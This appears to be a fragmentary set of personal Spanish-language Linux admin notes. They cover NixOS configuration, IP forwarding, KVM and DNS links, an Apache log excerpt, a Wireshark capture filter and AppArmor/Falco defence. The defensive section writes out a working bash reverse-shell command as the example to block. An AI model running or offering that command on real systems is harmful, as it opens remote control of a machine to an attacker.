Blessed nullx5

https://www.youtube.com/watch?v=FJVFXsNzYZQ

https://search.nixos.org/packages

Si vienes de Ubuntu o Arch, la tentación de usar nix-env -i es grande. Resístela. La verdadera fuerza de NixOS está en añadir los paquetes a la sección environment.systemPackages de tu archivo /etc/nixos/configuration.nix. Así, tu sistema siempre será reproducible.

NixOS guarda todas las versiones anteriores de tu configuración por si algo sale mal. Esto ocupa espacio.

# configurar vpsfree con IPv6 nodo de salida Exit Node zerotier

echo "net.ipv4.ip_forward=1" | sudo tee -a /etc/sysctl.conf
echo "net.ipv6.conf.all.forwarding=1" | sudo tee -a /etc/sysctl.conf
sudo sysctl -p

• https://www.server-world.info/en/note?os=Ubuntu_24.04&p=kvm&f=1
• https://www.server-world.info/en/note?os=Debian_13&p=kvm&f=1

┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┐
│                                            Herramientas de usuario                                                  │
│                                                                                                                     │
│  qemu-system    virt-install     virt-clone           virsh / virt-manager             qemu-img                     |

• https://www.fpgenred.es/DNS/
• https://labex.io/lesson/what-is-dns
• https://drive.google.com/file/d/1iD_rmCWLLhGrvJxraDkRTyNUOZxe7IKJ/view?usp=sharing #componentes DNS y flujo de una consulta
• https://www.cloudflare.com/es-es/learning/dns/what-is-dns/
• https://www.cloudflare.com/es-es/learning/dns/dns-records/ # registros DNS

sudo tail -f /var/log/apache2/access.log

                                                                                                                                                               INT ✘  6s    ▓▒░
192.168.100.35 - - [18/Dec/2025:01:27:30 -0500] "GET / HTTP/1.1" 200 3460 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.168.100.35 - - [18/Dec/2025:01:27:30 -0500] "GET /icons/ubuntu-logo.png HTTP/1.1" 200 3607 "http://192.168.100.35/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
192.168.100.35 - - [18/Dec/2025:01:27:30 -0500] "GET /favicon.ico HTTP/1.1" 404 492 "http://192.168.100.35/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"

((tcp.flags.syn == 1 && tcp.flags.ack == 0 && ip.dst == 192.168.100.35) || (icmp && ip.dst == 192.168.100.35) || (arp && arp.dst.proto_ipv4 == 192.168.100.35)) && !(ip.addr == 8.8.8.8)

👀 Tip forense rápido

Después de aplicar el filtro:

• crear perfiles por aplicacion

Bloquear reverse shell bash -i >& /dev/tcp/192.168.100.5/443 0>&1

sudo apt install apparmor

sudo systemctl status apparmor

🛡️ ¿Bloquea Falco?

❌ No bloquea por sí solo ✔ Detecta con precisión quirúrgica

Pero puedes reaccionar automáticamente:

# en la terminal con [alias status], despliega el conteniddo del alias
# en la terminal con alias lista todos los alias

nvim .zshrc

#Mis alias
#